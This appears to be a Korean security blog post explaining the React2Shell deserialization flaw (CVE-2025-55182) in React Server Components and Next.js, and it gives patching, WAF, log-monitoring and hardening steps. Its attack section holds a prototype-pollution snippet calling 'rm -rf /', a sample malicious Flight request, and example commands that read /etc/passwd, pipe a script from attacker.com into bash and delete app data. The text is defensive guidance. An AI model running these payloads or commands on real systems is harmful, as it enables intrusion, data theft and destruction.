React 19 CVE-2025-55182 React2Shell 취약점 완벽 분석: CVSS 10.0 심각 보안 위협 대응 가이드

2025년 12월 3일, 보안 연구원 Lachlan Davidson에 의해 React와 Next.js에 대한 충격적인 보안 취약점이 공개되었습니다. "React2Shell"로 명명된 이 취약점(CVE-2025-55182)은 최고 심각도인 CVSS 10.0을 기록하며, 인증 없이도 원격 코드 실행(RCE)을 가능하게 하는 치명적인 결함입니다. 미국 사이버보안·인프라보안국(CISA)은 이를 "악용 중인 알려진 취약점(KEV)" 목록에 추가했으며, 연방 기관들에게 2025년 12월 26일까지 반드시 패치하도록 지시했습니다. 한국인터넷진흥원(KISA)도 긴급 보안 권고를 발표하여 국내 서비스 운영자들에게 즉시 업데이트를 당부하고 있습니다.

 

이번 취약점의 위험성은 매우 크므로, 현재 React 19 또는 Next.js를 사용 중인 모든 개발자와 운영자들은 반드시 이 글을 정독하고 즉시 대응해야 합니다.

React2Shell 취약점의 개요

취약점이란 무엇인가?

React2Shell(CVE-2025-55182)은 React의 서버 컴포넌트(React Server Components, RSC) 기능에서 사용하는 "Flight" 프로토콜의 역직렬화(deserialization) 처리 과정에 존재하는 심각한 보안 결함입니다. 이 취약점으로 인해 인증이 완전히 우회되며, 공격자는 특수하게 조작된 HTTP 요청만으로도 서버에서 임의의 자바스크립트 코드를 실행할 수 있습니다.

 

가장 놀라운 점은 별도의 설정 변경이나 추가 구성 없이도 기본 설정 상태의 React 19 및 Next.js 애플리케이션이 완전히 취약하다는 것입니다. 즉, create-next-app으로 새로운 프로젝트를 만들고 프로덕션 빌드를 한 후 특별한 코드 수정 없이 배포했다면, 여러분의 서버도 지금 이 순간 공격에 노출되어 있을 수 있습니다.

 

영향을 받는 버전

 

React의 경우
- React 19.0.0 ~ 19.2.0
- 패치 버전: 19.0.1, 19.1.2, 19.2.1

 

Next.js의 경우
- Next.js 15.x (모든 버전)
- Next.js 16.x (모든 버전)
- Next.js 14 Canary 버전 (14.3.0-canary.77 이상)
- 단, App Router를 사용하는 경우만 영향을 받음

 

기타 프레임워크
React에 의존하는 다음의 프레임워크들도 영향을 받습니다.
- Waku
- React Router
- RedwoodSDK
- @parcel/rsc
- @vitejs/plugin-rsc

 

취약점의 심각성

보안 업계는 이 취약점을 과거의 Log4j 사태에 필적하는 중대한 위협으로 평가하고 있습니다.

• 클라우드 환경의 45%가 최소 하나 이상의 취약한 React 인스턴스를 보유하고 있습니다.
• 클라우드 환경의 12%가 취약한 React 또는 Next.js 애플리케이션을 인터넷에 직접 노출하고 있습니다.
• 국내의 약 18만대 서버가 이 공격에 무방비로 당할 수 있다고 추정됩니다.
• 현재까지 30곳 이상의 조직이 이미 이 취약점으로 인해 피해를 입었습니다.

Amazon AWS, Palo Alto Networks Unit 42 등 주요 보안 기업들은 이미 공격자들(특히 중국 국가 기반 위협 그룹)이 이 취약점을 적극적으로 악용하고 있음을 확인했습니다. 공격 수법도 다양하여, 암호화폐 채굴 악성코드부터 시작해서 자격증명 탈취, 그리고 Sliver 백도어 같은 고도의 지속적 위협(APT)까지 모두 관찰되고 있습니다.

취약점의 기술적 배경

React Server Components(RSC)란?

React Server Components는 2024년 현재 React의 최신 기능 중 하나입니다. RSC는 React가 직면한 성능 및 용량 문제를 해결하기 위해 도입되었습니다.

 

전통적인 React 애플리케이션에서는 모든 컴포넌트 로직이 클라이언트 브라우저에서 실행되었습니다.

1. 매우 큰 번들 크기가 필요했습니다.
2. 민감한 데이터(API 키, 비밀번호, 데이터베이스 연결 정보)를 클라이언트에 노출하기 쉬웠습니다.
3. 외부 API 호출이 모두 클라이언트에서 일어나야 했으므로 성능이 저하되었습니다.

RSC는 이를 해결하기 위해

• 서버에서 컴포넌트 렌더링의 상당 부분을 처리합니다.
• 그 결과(HTML 또는 데이터)만 클라이언트로 전송합니다.
• 클라이언트는 이를 받아서 최종 UI를 그립니다.

이를 통해 번들 크기를 줄이고, 민감한 데이터를 안전하게 서버에만 보관할 수 있었습니다. Next.js 13 이상은 기본적으로 App Router에서 RSC를 지원하며, 이는 현대 웹 개발의 중요한 패러다임 변화였습니다.

 

Flight 프로토콜의 역할

RSC가 클라이언트와 서버 간에 데이터를 주고받기 위해서는 직렬화(serialization)와 역직렬화(deserialization) 과정이 필요합니다. React는 이를 위해 Flight 프로토콜이라는 고유의 통신 방식을 개발했습니다.

 

Flight 프로토콜은 JSON과 유사하지만, 더욱 복잡한 JavaScript 객체들을 처리할 수 있도록 설계되었습니다.

• React 컴포넌트 트리
• Promise 객체
• Map, Set 등의 컬렉션 타입
• 바이너리 데이터 (Blob)

클라이언트가 서버 함수를 호출하거나 Server Action을 실행할 때

1. 클라이언트는 호출 정보를 Flight 프로토콜로 직렬화합니다.
2. 이를 HTTP 요청의 바디(Body)에 담아 서버로 전송합니다.
3. 서버는 이를 수신하고 역직렬화하여 원래의 JavaScript 객체로 복원합니다.
4. 그리고 해당 함수를 실행합니다.

여기서 문제가 발생합니다.

 

역직렬화 과정의 결함

CVE-2025-55182 취약점의 근본 원인은 Flight 프로토콜의 역직렬화 과정에서 입력 검증이 불충분하다는 것입니다.

공격자는 악의적으로 조작된 Flight 페이로드를 만들어서 서버로 전송할 수 있습니다. 이 페이로드는 다음과 같은 기법을 사용합니다.

 

프로토타입 오염(Prototype Pollution)

JavaScript에서 모든 객체는 프로토타입 체인을 가집니다. 만약 공격자가 이 체인을 조작할 수 있다면, 마치 모든 객체에 새로운 속성을 추가한 것처럼 동작하게 할 수 있습니다.

 

예를 들어

// 공격자가 조작한 페이로드가 다음처럼 작동
Object.prototype.then = function(resolve) {
  // 악성 코드
  require('child_process').execSync('rm -rf /');
}

이렇게 하면, 서버의 코드에서 Promise를 사용하거나 thenable 객체를 다룰 때, 의도하지 않게 공격자의 악성 코드가 실행됩니다.

 

생성자 함수 악용

공격자는 또한 __proto__.constructor를 이용해서 Function 생성자에 접근할 수 있습니다.

// 공격 페이로드
{
  __proto__: {
    constructor: {
      prototype: {
        // 악성 코드 주입
      }
    }
  }
}

이를 통해 사실상 임의의 자바스크립트 코드를 실행할 수 있습니다.

 

$형식의 특수 참조 조작

Flight 프로토콜은 $를 접두사로 사용하여 객체 참조를 표현합니다 (예: $1:constructor:constructor). 공격자는 이 형식을 악용하여 내부 모듈과 함수를 직접 접근하고 조작할 수 있습니다.

실제 공격 시나리오

공격이 어떻게 진행되는가?

공격자는 먼저 대상 웹사이트가 React 19 기반의 RSC 기능(또는 Next.js App Router)을 사용 중인지 파악합니다. 이는 매우 간단합니다.

• HTTP 요청 헤더에 Next-Action 헤더가 있는지 확인
• HTML에서 특정한 Script 태그 패턴을 찾기
• Next.js 특유의 파일 구조 탐지

악성 페이로드 생성

공격자는 대상이 RSC를 사용하고 있음을 확인한 후, 특수하게 조작된 Flight 프로토콜 페이로드를 만듭니다.

예를 들어, 공격자는 다음과 같은 페이로드를 전송할 수 있습니다.

POST / HTTP/1.1
Host: target-website.com
Next-Action: <server-action-hash>
Content-Type: multipart/form-data

------boundary
Content-Disposition: form-data; name="0"

["$1:constructor:constructor"]
------boundary
Content-Disposition: form-data; name="1"

["$@0"]
------boundary
Content-Disposition: form-data; name="2"

[{"__proto__":{"then":function(){/* 악성 코드 */}}}]
------boundary--

이 페이로드는 React의 역직렬화 과정에서 프로토타입을 오염시키고, 최종적으로 임의의 코드를 실행하도록 설계되었습니다.

 

원격 코드 실행

서버에서 이 페이로드를 역직렬화할 때

1. React는 이를 정상적인 RSC 요청으로 간주합니다.
2. 역직렬화 과정 중에 공격자의 프로토타입 오염 코드가 실행됩니다.
3. 공격자는 require('child_process')를 통해 Node.js 명령을 실행합니다.
4. 서버 권한으로 임의의 시스템 명령어를 실행할 수 있게 됩니다.

예를 들어

• cat /etc/passwd - 시스템 사용자 목록 탈취
• curl http://attacker.com/malware.sh | bash - 악성 스크립트 다운로드 및 실행
• rm -rf /app - 애플리케이션 데이터 삭제

실제 악용 사례

보안 연구원들이 관찰한 실제 공격 사례들

• 암호화폐 채굴: 공격자들이 서버를 장악한 후 CPU 리소스를 이용해 암호화폐를 채굴
• 자격증명 탈취: 환경 변수에서 API 키, 데이터베이스 비밀번호, AWS 접근 토큰 등을 탈취
• 데이터베이스 접근: 데이터베이스 연결 정보를 얻은 후 고객 데이터 탈취
• 백도어 설치: Sliver 같은 고급 악성코드를 설치하여 지속적인 접근 유지
• 랜섬웨어 배포: 서버 데이터를 암호화한 후 복구 대가를 요구

React2Shell이 가져오는 위험성

인증 없는 공격

가장 심각한 측면은 인증이 전혀 필요하지 않다는 것입니다.

공격자는

• 로그인할 필요가 없습니다.
• 특별한 권한이 필요하지 않습니다.
• 단순히 HTTP 요청을 보내기만 하면 됩니다.

인터넷에 노출된 모든 React 19 또는 Next.js 애플리케이션이 잠재적인 공격 대상이 됩니다.

 

기본 설정 상태에서 취약

대부분의 보안 취약점은 특정한 설정이나 라이브러리의 잘못된 사용으로 인해 발생합니다. 하지만 이 취약점은 다릅니다.

• create-next-app으로 새 프로젝트를 만들었다면
• 어떤 보안 설정도 변경하지 않았다면
• 그냥 코드를 작성하고 배포했다면

이미 취약합니다. 개발자의 실수가 아니라 프레임워크 자체의 문제입니다.

 

거의 100%에 가까운 성공률

보안 연구 회사 Wiz의 연구에 따르면, 이 취약점의 악용 성공률은 거의 100%에 가깝습니다.

• 대부분의 공격 시도가 성공합니다.
• 공격이 감지되거나 차단될 가능성이 매우 낮습니다.
• 한번의 성공적인 공격만으로도 전체 서버 시스템을 장악당할 수 있습니다.

넓은 영향 범위

이 취약점의 영향은 매우 광범위합니다.

• React 자체: 19.0.0 ~ 19.2.0 모두 영향
• Next.js: 15.x, 16.x 대부분의 버전 영향
• 기타 프레임워크: React에 의존하는 Waku, React Router 등도 영향
• 호스팅 플랫폼: Vercel, Netlify 등에 배포된 앱도 영향
• 클라우드 서비스: AWS, Google Cloud, Azure 등 모든 클라우드 환경에 영향

현재 5000만개 이상의 웹사이트가 React 또는 Next.js를 사용하고 있으므로, 잠재적 영향도 매우 큽니다.

 

탐지 어려움

이 공격은 매우 탐지하기 어렵습니다.

• 정상적인 Flight 프로토콜 요청처럼 보입니다.
• 특별한 HTTP 헤더나 URL 패턴을 가지지 않습니다.
• 간단한 로그 분석으로는 공격과 정상 트래픽을 구분하기 어렵습니다.
• 공격이 발생한 후에야 피해를 알 수 있는 경우가 많습니다.

긴급 대응 방법

즉시 버전 확인

가장 먼저 할 일은 현재 사용 중인 React와 Next.js 버전을 확인하는 것입니다.

 

프로젝트 디렉토리에서

# package.json 확인
cat package.json | grep -E "\\\\"next\\\\"|\\\\"react\\\\"|\\\\"react-dom\\\\""

# 또는 npm으로 확인
npm list next react react-dom

결과 예시

next@15.0.0
react@19.0.0
react-dom@19.0.0

취약성 판단

• React가 19.0.0 ~ 19.2.0이면서 Next.js를 사용한다면: 긴급 업데이트 필요
• Next.js가 15.x 또는 16.x인 경우: 즉시 업데이트 필요
• Next.js 14를 사용 중이면서 Canary 버전이 아니라면: 일단 안전, 하지만 업데이트 권장

즉시 업데이트 실행

버전 확인 후 즉시 다음 명령어로 업데이트하세요.

 

npm을 사용하는 경우

# 최신 버전으로 업데이트
npm install next@latest react@latest react-dom@latest

# 또는 특정 패치 버전으로 업데이트 (권장)
npm install next@15.1.0 react@19.0.1 react-dom@19.0.1

Yarn을 사용하는 경우

# 최신 버전으로 업데이트
yarn add next@latest react@latest react-dom@latest

# 또는
yarn upgrade next react react-dom --latest

pnpm을 사용하는 경우

# 최신 버전으로 업데이트
pnpm update next react react-dom --latest

TypeScript를 사용한다면 타입 정의도 함께 업데이트

npm install --save-dev @types/react@latest @types/react-dom@latest

업데이트 결과 확인

업데이트 후 반드시 다음을 확인하세요.

# 설치된 버전 재확인
npm list next react react-dom

# 또는
yarn list --pattern "next|react"

최소 요구 버전

• React: 19.0.1, 19.1.2, 19.2.1 중 하나 이상
• Next.js: 15.1.0, 16.0.0 이상

로컬 빌드 및 테스트

업데이트 후 로컬에서 반드시 빌드하고 테스트하세요.

# 로컬 테스트
npm run dev

# 빌드 테스트
npm run build

# 빌드된 버전 실행
npm run start

주의사항

• 정상적으로 빌드되는지 확인
• 주요 기능들이 정상 작동하는지 테스트
• 콘솔 에러가 없는지 확인

프로덕션 배포

로컬에서 문제가 없음을 확인한 후, 반드시 프로덕션 환경에 재배포하세요.

 

Vercel에 배포한 경우

# 코드를 커밋하고 push하면 자동으로 재배포
git add package.json package-lock.json
git commit -m "Security patch: Update React and Next.js to fix CVE-2025-55182"
git push origin main

자체 서버에 배포한 경우

# 새로운 프로덕션 빌드 생성
npm run build

# 기존 서버 중단
pm2 stop <app-name>

# 새 버전 배포
pm2 restart <app-name>

# 상태 확인
pm2 status

Docker를 사용하는 경우

# Dockerfile에서 npm install 다시 실행
docker build -t myapp:latest .

# 기존 컨테이너 중단
docker stop <container-id>

# 새 이미지로 컨테이너 시작
docker run -d -p 3000:3000 myapp:latest

Lock 파일 확인

업데이트 후 반드시 package-lock.json 또는 yarn.lock 파일도 함께 커밋하세요.

 

이를 통해

• 팀원들이 동일한 버전을 받도록 보장
• 배포 환경에서 정확한 버전이 설치되도록 보장
• 버전 불일치로 인한 문제 방지

추가 보안 조치

WAF(웹 애플리케이션 방화벽) 설정

업데이트만으로는 부족합니다. WAF를 통한 추가 보호도 필수입니다.

 

Cloudflare 사용자

1. Cloudflare 대시보드 접속
2. Security → WAF Rules로 이동
3. "CVE-2025-55182" 또는 "React2Shell" 규칙 활성화
4. 자동으로 악성 Flight 페이로드 차단

AWS WAF 사용자

1. AWS Management Console 접속
2. WAF & Shield → Web ACLs
3. 새 규칙 추가 또는 기존 규칙 업데이트
4. 다음 패턴 차단
   • __proto__ 포함된 요청
   • constructor 포함된 요청
   • $@ 형식의 비정상적인 Flight 참조

Google Cloud Armor 사용자

1. Google Cloud Console 접속
2. Cloud Armor 정책 선택
3. 새로운 보안 정책 추가
4. CVE-2025-55182 관련 위협으로부터 보호하는 미리 정의된 규칙 적용

Nginx/Apache 웹서버 사용자

Nginx 설정 예시

# /etc/nginx/conf.d/security.conf

# React2Shell 공격 차단
if ($request_body ~* "__proto__|constructor|thenable") {
    return 403;
}

if ($request_body ~* "\$@[0-9]+") {
    return 403;
}

Apache 설정 예시 (mod_security)

# /etc/apache2/mods-enabled/security2.conf

SecRule REQUEST_BODY "@contains __proto__" "id:1000,phase:2,deny,status:403"
SecRule REQUEST_BODY "@contains constructor" "id:1001,phase:2,deny,status:403"
SecRule REQUEST_BODY "@rx \$@[0-9]+" "id:1002,phase:2,deny,status:403"

로그 모니터링 강화

공격이 시도되었는지 확인하기 위해 로그를 주의 깊게 모니터링하세요.

 

확인할 로그 패턴

• POST 요청이 / 또는 특정 라우트로 향하는 요청
• Content-Type: multipart/form-data 포함된 요청
• __proto__ 또는 constructor 포함된 요청 바디
• 비정상적인 Flight 프로토콜 청크

로그 확인 명령어 (Linux)

# Next.js 애플리케이션 로그에서 의심스러운 요청 찾기
grep -E "__proto__|constructor|\$@[0-9]+" /var/log/nextjs/*.log

# Nginx 접근 로그 확인
tail -f /var/log/nginx/access.log | grep -E "POST|multipart"

# Apache 접근 로그 확인
tail -f /var/log/apache2/access.log | grep -E "POST|multipart"

DataDog, New Relic 같은 모니터링 서비스 사용

• 사전에 알림 설정
• 비정상적인 요청 패턴 자동 탐지
• 서버 리소스 사용량 급증 감시 (암호화폐 채굴 탐지)

의존성 스캔 도구 실행

악성 의존성이 설치되었는지 확인하세요.

# npm audit으로 취약점 스캔
npm audit

# 심각한 취약점 자동 수정
npm audit fix

# yarn 사용 시
yarn audit

OWASP Dependency-Check 사용

# 설치
npm install -g dependency-check

# 스캔 실행
dependency-check --scan ./node_modules

서버 권한 제한

Node.js 프로세스가 최소 권한으로 실행되도록 설정하세요.

# 일반 사용자로 Next.js 실행 (root 아님)
# /etc/systemd/system/nextjs.service

[Service]
User=nextjs
Group=nextjs
ExecStart=/usr/bin/npm run start
WorkingDirectory=/home/nextjs/myapp

Docker 사용 시

# Dockerfile
FROM node:20-alpine

# 일반 사용자로 실행
RUN addgroup -g 1001 -S nodejs
RUN adduser -S nextjs -u 1001

USER nextjs

COPY --chown=nextjs:nodejs . .
RUN npm install
CMD ["npm", "run", "start"]

환경 변수 보호

API 키, 데이터베이스 비밀번호 등이 노출되지 않도록 주의하세요.

 

하면 안 되는 것

// ❌ 안 함: 비밀번호를 소스 코드에 포함
const DB_PASSWORD = "my-secret-password";

// ❌ 안 함: 환경 변수를 클라이언트에 노출
console.log(process.env.API_KEY); // 클라이언트에서 읽을 수 없도록 함

해야 할 것

// ✅ 함: .env.local 파일 사용
// .env.local
DB_PASSWORD=my-secret-password
DATABASE_URL=postgresql://...

// ✅ 함: 서버 코드에서만 접근
// src/server/db.js
const dbPassword = process.env.DB_PASSWORD; // 서버에서만 사용

// ✅ 함: NEXT_PUBLIC_* 접두사만 클라이언트에 노출
// .env.local
NEXT_PUBLIC_API_URL=https://api.example.com

검증 체크리스트

React 19의 취약점에 대해 제대로 대응했는지 확인하기 위한 체크리스트입니다.

 

필수 항목

• [ ] npm list next react react-dom으로 현재 버전 확인했는가?
• [ ] React가 19.0.1, 19.1.2, 19.2.1 중 하나로 업데이트되었는가?
• [ ] Next.js가 최신 패치 버전으로 업데이트되었는가?
• [ ] 로컬에서 npm run build로 빌드되는가?
• [ ] 로컬에서 npm run dev로 정상 실행되는가?
• [ ] 프로덕션 환경에 새 버전이 배포되었는가?
• [ ] package-lock.json 또는 yarn.lock이 커밋되었는가?

권장 항목

• [ ] WAF 규칙이 활성화되어 있는가?
• [ ] 서버 로그 모니터링이 설정되어 있는가?
• [ ] 의존성 스캔 도구를 실행했는가?
• [ ] Node.js 프로세스가 일반 사용자로 실행되도록 설정했는가?
• [ ] 환경 변수가 제대로 보호되고 있는가?
• [ ] CI/CD 파이프라인이 자동으로 취약점을 스캔하도록 설정했는가?
• [ ] 팀원들에게 보안 업데이트를 공유했는가?

지속적 모니터링

• [ ] 매일 서버 로그를 확인하는가?
• [ ] npm이나 Yarn에서 새로운 보안 업데이트를 추적하는가?
• [ ] KISA, CISA 등의 보안 공지를 정기적으로 확인하는가?

FAQ 및 일반적인 질문

Q1: 내가 Server Actions를 사용하지 않으면 안전한가?

A: 아니요, 안전하지 않습니다. React Server Components 기능 자체를 사용하고 있다면, 비록 직접 Server Actions를 정의하지 않았더라도 취약합니다. 기본적으로 기본 설정의 Next.js App Router는 RSC를 활성화하고 있습니다.

 

Q2: Pages Router(기존 라우터)를 사용 중이면 안전한가?

A: Next.js 14 안정 버전의 Pages Router 사용자는 대부분 안전합니다. 하지만 Next.js 15, 16을 사용 중이라면 업데이트해야 합니다.

 

Q3: 이미 공격을 당했을 가능성이 있는가?

A: 만약 이전에 이 취약점을 노출하고 있었다면, 공격을 당했을 가능성이 있습니다. 다음을 확인하세요.

• 서버 로그에서 비정상적인 Process 실행
• 서버 리소스 사용량 급증 (특히 CPU)
• 데이터베이스 접근 로그에서 비정상적인 쿼리
• 의외의 네트워크 연결

Q4: 마이크로 프론트엔드나 모노레포를 사용 중인데, 어떻게 업데이트하나?

A: 각 개별 프로젝트마다 업데이트해야 합니다. 특히 공유 dependencies 구조라면, 루트 package.json을 먼저 업데이트하세요.

# 루트에서
npm install react@latest react-dom@latest

# 각 프로젝트에서도
npm install

Q5: 업데이트 후 문제가 생기면?

A: 업데이트로 인한 호환성 문제가 생길 수 있습니다.

1. 변경 로그 확인: https://github.com/facebook/react/releases
2. 커밋 되돌리기: npm install react@19.0.0 후 재테스트
3. GitHub Issues에서 유사 문제 검색
4. 필요시 마이너 버전으로 보수적 업데이트

React2Shell(CVE-2025-55182)은 단순한 보안 결함이 아닙니다. 이는 웹 생태계 전체를 위협하는 중대한 사건입니다.

1. 즉시 업데이트가 필수입니다. 더 이상 미룰 여지가 없습니다.
2. 기본 설정만으로도 취약하므로, 개발자의 실수가 아닙니다.
3. 광범위한 영향을 받으므로, 당신의 조직도 위험할 가능성이 높습니다.
4. 현장에서 활발히 악용되고 있으므로, 지연은 곧 피해로 이어집니다.

이 글에서 제시한 대응 방법들을 차근차근 따라가세요.

• 이 시간에 즉시 버전을 확인하고
• 긴급 업데이트를 실행하고
• 프로덕션 환경에 반드시 배포하고
• 추가 보안 조치를 적용하세요.

React와 Next.js 사용자 여러분의 빠른 대응이 전체 웹 생태계의 보안을 지킬 수 있습니다. 지금이 바로 행동할 때입니다.

 

AI 코딩 도구 프롬프트 인젝션 취약점 PromptPwnd 실체와 대응방안